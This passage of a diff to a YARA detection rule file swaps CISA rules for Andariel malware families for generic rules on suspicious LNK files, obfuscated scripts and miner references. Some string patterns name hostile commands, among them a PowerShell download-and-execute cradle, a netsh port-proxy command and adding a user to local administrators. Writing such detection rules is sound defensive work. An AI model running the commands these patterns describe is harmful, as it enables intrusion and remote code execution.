+		logic_hash = "60bc5d8d0853f474b81d2274a65977a12a481e4b669b38ae47a325eeb60d2735"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	strings:
-		$str1 = "/kaos/"
-		$str2 = "Abstand ["
-		$str3 = "] anwenden"
-		$str4 = "cmVjYXB0Y2hh"
-		$str5 = "/bin/sh"
-		$str6 = "utilities.CIpaddress"
-		$str7 = "engine.NewEgg"
-		$str8 = "%s%04x%s%s%s"
-		$str9 = "Y2FwdGNoYV9zZXNzaW9u"
-		$str10 = "utilities.EierKochen"
-		$str11 = "kandidatKaufhaus"
+		$s1 = "Microsoft(C) Windows(C) Operating System" fullword wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Trifaux_Easyrat_JUPITER : FILE
+rule SIGNATURE_BASE_SUSP_LNK_File_Appdata_Roaming : FILE
 {
 	meta:
-		description = "Detects a variant of the EasyRAT malware family"
-		author = "CISA.gov"
-		id = "8bd72287-59da-53cf-9015-66149303e59f"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L44-L59"
+		description = "Detects a suspicious link file that references to AppData Roaming"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d905e58f-ae2e-5dc2-b206-d0435b023df0"
+		date = "2018-05-16"
+		modified = "2025-03-21"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L148-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6108035dbebd34fe994fc1f8b4123321321f6ed5c022be6e84a88f905ea6fb73"
-		score = 80
+		logic_hash = "5e5c78d3fe3fcdbfb097f833fbb1e15ad1f79e63b330eaba754d8b5296b5165a"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$InitOnce = "InitOnceExecuteOnce"
-		$BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }
-		$Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide
+		$s2 = "AppData" fullword wide
+		$s3 = "Roaming" fullword wide
+		$s4 = { 00 2E 00 65 00 78 00 65 00 2E 00 43 00 3A 00 5C
+              00 55 00 73 00 65 00 72 00 73 00 5C }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Cutiedrop_Magicrat : FILE
+rule SIGNATURE_BASE_SUSP_LNK_File_Pathtraversal : FILE
 {
 	meta:
-		description = "Detects the MagicRAT variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "104244de-83fb-5112-a2b6-e20d38a6ced6"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L61-L85"
+		description = "Detects a suspicious link file that references a file multiple folders lower than the link itself"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f4f6709f-9c4d-5f0c-9826-97444d282adc"
+		date = "2018-05-16"
+		modified = "2025-03-21"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L170-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f289bbd71bdeaf2c42063642454679ec26de5ed24c020af40db694a0ced54884"
-		score = 80
+		logic_hash = "9935c454518abe7fd4ec4f09e36e4200ec7c9f3b3ad004e9b49d60c08f508236"
+		score = 40
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$config_os_w = "os/windows" ascii
-		$config_os_l = "os/linux" ascii
-		$config_os_m = "os/mac" ascii
-		$config_comp_msft = "company/microsoft" ascii
-		$config_comp_orcl = "company/oracle" ascii
-		$POST_field_1 = "session=" ascii
-		$POST_field_2 = "type=" ascii
-		$command_misspelled = "renmae" ascii
+		$s1 = "..\\..\\..\\..\\..\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_HHSD_Filetransfertool : FILE
+rule SIGNATURE_BASE_SUSP_Script_Obfuscation_Char_Concat
 {
 	meta:
-		description = "Detects a variant of the HHSD File Transfer Tool"
-		author = "CISA.gov"
-		id = "46b6dbaf-1272-5bbd-a586-5e48ba6c5022"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L87-L125"
+		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d3bfdfd-ef8f-5740-ac1f-5835c7ce0f43"
+		date = "2018-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L188-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "757fd5e34bcbdf4efdc86a9dff058d92a0479019fbda1d26ad3ee4924b59f0cb"
-		score = 70
+		logic_hash = "28b648e0e1c22fefa49a937f40bd4ed09c5d3894ff059979bad69e8bc98fcac2"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b"
 
 	strings:
-		$handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }
-		$err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }
-		$buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }
-		$hash_call_loadlib = { B? 8D 10 B7 F8 E8 }
-		$hash_call_unk = { B? 91 B8 F6 88 E8 }
+		$s1 = "\"c\" & \"r\" & \"i\" & \"p\" & \"t\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $handshake , $err_xor_str , $buf_add_cmp_1f ) and 1 of ( $hash_call_* ) or 2 of ( $handshake , $err_xor_str , $buf_add_cmp_1f )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Atharvan_3RAT : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_IEX_Download_Combo
 {
 	meta:
-		description = "Detects a variant of the Atharvan 3RAT malware family"
-		author = "CISA.gov"
-		id = "9ff6998a-a2dd-5671-bd3f-ee69561f71ef"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L127-L141"
+		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1dfedcb0-345c-548c-85ac-3c1e78bfd9e2"
+		date = "2018-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L202-L218"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "741318234e245a35accc0b102a7891559ce5ef868ccdc3e6e4c8e59d8dea8b24"
-		score = 80
+		logic_hash = "0a1507859354e0e0d9284befcf777c4d3883496eb96524a246a1df4f3a247aa9"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5"
 
 	strings:
-		$3RAT = "D:\\rang\\TOOL\\3RAT"
-		$atharvan = "Atharvan_dll.pdb"
+		$x1 = "IEX ((new-object net.webclient).download" ascii nocase
+		$fp1 = "chocolatey.org"
+		$fp2 = "Remote Desktop in the Appveyor"
+		$fp3 = "/appveyor/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		$x1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Lilithrat_Variant : FILE
+rule SIGNATURE_BASE_SUSP_Win32Dll_String : FILE
 {
 	meta:
-		description = "Detects a variant of the Lilith RAT malware family"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "916a289b-db7b-5f09-9d3e-589c3f09101d"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L143-L178"
+		description = "Detects suspicious string in executables"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1c78386-c23d-5138-942a-3da90e5802cc"
+		date = "2018-10-24"
+		modified = "2025-03-21"
+		reference = "https://medium.com/@Sebdraven/apt-sidewinder-changes-theirs-ttps-to-install-their-backdoor-f92604a2739"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L220-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ce68908468ff85683b081842fa4faa579fbf6f7dc1a7fab5dcf7eac63d90aea"
-		score = 80
+		logic_hash = "514596e078483920cedf0091cd769d8462acfd39956c3ed3e12d630b02ebb7cc"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		hash1 = "7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1"
 
 	strings:
-		$lilith_1 = "Initiate a CMD session first." ascii
-		$lilith_2 = "CMD is not open" ascii
-		$lilith_3 = "Couldn't write command" ascii
-		$lilith_4 = "Couldn't write to CMD: CMD not open" ascii
-		$unique_1 = "Upload Error!" ascii
-		$unique_2 = "ERROR: Downloading is already running!" ascii
-		$unique_3 = "ERROR: Unable to open file:" ascii
-		$unique_4 = "General error" ascii
-		$unique_5 = "CMD error" ascii
-		$unique_6 = "killing self" ascii
+		$s1 = "win32dll.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $lilith_* ) or 4 of ( $unique_* ) or 1 of ( $lilith_4 , $unique_2 ) )
+		filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Sockstroy_Strings_Opcodes : FILE
+rule SIGNATURE_BASE_SUSP_Modified_Systemexefilename_In_File : FILE
 {
 	meta:
-		description = "Detects a variant of the SocksTroy malware family"
-		author = "CISA.gov"
-		id = "9e7fb6ba-771e-5cae-a0d5-c0b95ee6d4e9"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L180-L199"
+		description = "Detecst a variant of a system file name often used by attackers to cloak their activity"
+		author = "Florian Roth (Nextron Systems)"
+		id = "97d91e1b-49b8-504e-9e9c-6cfb7c2afe41"
+		date = "2018-12-11"
+		modified = "2025-03-21"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L234-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ab31b285d0dba1745a2d8b172bd02931c6138e2b8e541203b88f111d179549b"
-		score = 80
+		logic_hash = "45c01024c4e6a3563cd27d8a78e2236d49aa795d24f322774a14b4c7289830c4"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		hash1 = "5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a"
+		hash2 = "f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e"
 
 	strings:
-		$strHost = "-host" wide
-		$strAuth = "-auth" wide
-		$SocksTroy = "SocksTroy"
-		$cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }
+		$s1 = "svchosts.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $str* ) and all of ( $c* ) or all of ( $Socks* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Agni : FILE
+rule SIGNATURE_BASE_SUSP_JAVA_Class_With_VBS_Content : FILE
 {
 	meta:
-		description = "Detects samples of the Agni malware family"
-		author = "CISA.gov"
-		id = "ffe3f427-c10a-5ad4-ab29-c0d9b576c30f"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L201-L216"
+		description = "Detects a JAVA class file with strings known from VBS files"
+		author = "Florian Roth"
+		id = "472cbeaf-28e7-51a2-b2e6-96c1d9d05b26"
+		date = "2019-01-03"
+		modified = "2025-03-20"
+		reference = "https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L250-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "302899b65e5a3a6beabbb46e80e3f0ff246c209206cc3a7f871011d68871d0b9"
-		score = 80
-		quality = 85
+		logic_hash = "bf325bbb6a448f977e4e661e4296c4145de9a809c79cee8538d660ecaff76e94"
+		score = 70
+		quality = 83
 		tags = "FILE"
+		hash1 = "e0112efb63f2b2ac3706109a233963c19750b4df0058cc5b9d3fa1f1280071eb"
 
 	strings:
-		$xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }
-		$stackstrings = { C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24 }
+		$a1 = "java/lang/String" ascii
+		$s1 = ".vbs" ascii
+		$s2 = "createNewFile" fullword ascii
+		$s3 = "wscript" fullword ascii nocase
+		$fp1 = "com/smm/"
+		$fp2 = "install"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and #xor > 100 and #stackstrings > 5
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 100KB and $a1 and all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Handshake
+rule SIGNATURE_BASE_SUSP_RAR_With_PDF_Script_Obfuscation : FILE
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware"
-		author = "CISA.gov"
-		id = "51dafa43-9da0-569a-9123-7e9800284046"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L218-L230"
+		description = "Detects RAR file with suspicious .pdf extension prefix to trick users"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a3d2f5e9-3052-551b-8b2c-abcdd1ac2e48"
+		date = "2019-04-06"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L277-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1978210d07d3298c0051c9faca16685636e3fb45131b4c2fcb7053a0b3ef84d1"
-		score = 75
+		logic_hash = "05e9fd7620a70a490548d4562c80497bcf888e493b8e1188e0a0e0c274e2a7e5"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "b629b46b009a1c2306178e289ad0a3d9689d4b45c3d16804599f23c90c6bca5b"
 
 	strings:
-		$ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }
+		$s1 = ".pdf.vbe" ascii
+		$s2 = ".pdf.vbs" ascii
+		$s3 = ".pdf.ps1" ascii
+		$s4 = ".pdf.bat" ascii
+		$s5 = ".pdf.exe" ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x21726152 and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Tasks
+rule SIGNATURE_BASE_SUSP_Netsh_Portproxy_Command
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware"
-		author = "CISA.gov"
-		id = "caa67a79-3ea6-5910-971c-f311722570ff"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L232-L247"
+		description = "Detects a suspicious command line with netsh and the portproxy command"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cbbd2042-572c-5283-bd45-e745b36733ad"
+		date = "2019-04-20"
+		modified = "2025-03-21"
+		reference = "https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L295-L308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d3fb944888b289d345ffc8dfcc988abd04b8cabd1729a66e8236f95ee6147ee"
-		score = 80
+		logic_hash = "dbf82a908e77886af1c31c51f5f6684015cbcb22bf28876c2e1b0dd1ea5bd2b4"
+		score = 65
 		quality = 85
 		tags = ""
+		hash1 = "9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09"
 
 	strings:
-		$ = "main.ScreenMonitThread"
-		$ = "main.CmdShell"
-		$ = "main.GetAllFoldersAndFiles"
-		$ = "main.SelfDelete"
+		$x1 = "netsh interface portproxy add v4tov4 listenport=" ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Blackstring : FILE
+rule SIGNATURE_BASE_SUSP_Dropperbackdoor_Keywords : FILE
 {
 	meta:
-		description = "Detects a variant of the GoLang Validalpha malware based on a file path found in the samples"
-		author = "CISA.gov"
-		id = "36f46a1d-69b6-5c99-9a54-6a14d62d2721"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L249-L261"
+		description = "Detects suspicious keywords that indicate a backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2942ba6d-a533-5954-bfcf-417262e2fac2"
+		date = "2019-04-24"
+		modified = "2025-03-21"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L310-L322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "07ea38890e99dd53437a23b7c4002851604b69a83bd7fb8971609226249e5954"
-		score = 90
+		logic_hash = "e83fa95bb2b9ac821d0a00af23834495066ad2cad38ef4f4dcc81aee75415d74"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		hash1 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
 
 	strings:
-		$ = "I:/01___Tools/02__RAT/Black"
+		$x4 = "DropperBackdoor" fullword wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_ELF_Backdoor_Fipps : FILE
+rule SIGNATURE_BASE_SUSP_SFX_Cmd : FILE
 {
 	meta:
-		description = "Detects a Linux backdoor named Fipps used by Andariel"
-		author = "CISA.gov"
-		id = "040bca78-8b7e-5397-8a2b-1ddeed59eea3"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L291-L307"
+		description = "Detects suspicious SFX as used by Gamaredon group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "87e75fe6-c2d7-5cb4-9432-7c37dbfe94b8"
+		date = "2018-09-27"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L324-L336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b57eb6c6b89e93863b9600c4a1384f3e064f236e827ef9ffc37b1e5dcff7d24"
-		score = 80
-		quality = 85
+		logic_hash = "592de6a2165396c4ae8f494e26e56d0a759903b51167b1531b791897dce66868"
+		score = 65
+		quality = 60
 		tags = "FILE"
+		hash1 = "965129e5d0c439df97624347534bc24168935e7a71b9ff950c86faae3baec403"
 
 	strings:
-		$a = "found mac address"
-		$b = "RecvThread"
-		$c = "OpenSSL-1.0.0-fipps"
-		$d = "Disconnected!"
+		$s1 = /RunProgram=\"hidcon:[a-zA-Z0-9]{1,16}.cmd/ fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Bindshell : FILE
+rule SIGNATURE_BASE_SUSP_XMRIG_Reference : FILE
 {
 	meta:
-		description = "Detects a BindShell used by Andariel"
-		author = "CISA.gov"
-		id = "3f6d83da-cea5-5e12-b0ba-93ace09d3d5c"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L309-L327"
+		description = "Detects an executable with a suspicious XMRIG crypto miner reference"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0a7324ce-90dc-5e6a-b22a-c29eccf324e9"
+		date = "2019-06-20"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/itaitevet/status/1141677424045953024"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L338-L350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "409aa6a27d81e14ea90d90ee02924cb11f5fecef592e6577b084f9ab2dde35fc"
+		logic_hash = "c1e6f5fc390a8ada0688885bba7ed90372915deba5a5e7e5b0cd17ec450ce240"
 		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$str_comspec = "COMSPEC"
-		$str_consolewindow = "GetConsoleWindow"
-		$str_ShowWindow = "ShowWindow"
-		$str_WSASocketA = "WSASocketA"
-		$str_CreateProcessA = "CreateProcessA"
-		$str_port = { B9 4D 05 00 00 89 }
+		$x1 = "\\xmrig\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Grease2 : FILE
+rule SIGNATURE_BASE_SUSP_Just_EICAR : FILE
 {
 	meta:
-		description = "Detects the Grease2 malware family used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "4defbe08-b3c6-5ab9-9a57-cec57ff42d9a"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L329-L350"
+		description = "Just an EICAR test file - this is boring but users asked for it"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5eedd77-36e2-56a0-be0c-2553043c225a"
+		date = "2019-03-24"
+		modified = "2025-03-21"
+		reference = "http://2016.eicar.org/85-0-Download.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L352-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "138fc915206e0c2834090ebc0a808913488121d51c17de3dbfadcb4099fbfa2f"
-		score = 80
+		logic_hash = "a48fc3542fb07131fe0a2e25277009d21b9ca7c9e112873249e5b9c31511af79"
+		score = 40
 		quality = 85
 		tags = "FILE"
+		hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
 
 	strings:
-		$str_rdpconf = "emp\\RDPConf.exe"
-		$str_rdpwinst = "emp\\RDPWInst.exe"
-		$str_net_user = "net user"
-		$str_admins_add = "net localgroup administrators"
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x3558 and filesize < 70 and $s1 at 0
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Nopineapple_Dtrack_Unpacked : FILE
+rule SIGNATURE_BASE_SUSP_PDB_Path_Keywords : FILE
 {
 	meta:
-		description = "Detects the Dtrack variant used by Andariel"
-		author = "CISA.gov"
-		id = "6ccaf24b-c110-5788-a792-fa7f39fb18f7"
-		date = "2024-07-25"
-		modified = "2024-12-12"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L352-L367"
+		description = "Detects suspicious PDB paths"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cbd9b331-58bb-5b29-88a2-5c19f12893a9"
+		date = "2019-10-04"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/stvemillertime/status/1179832666285326337?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L367-L393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf5f92a66ba3ff4db61102dcc50b781e8dd14ca7cb1eb70dae8eba2ed0910b66"
-		score = 80
+		logic_hash = "274b4b40190b8f7e3d123fad63e2bb6b2114a3dbef062791d442109cac149b08"
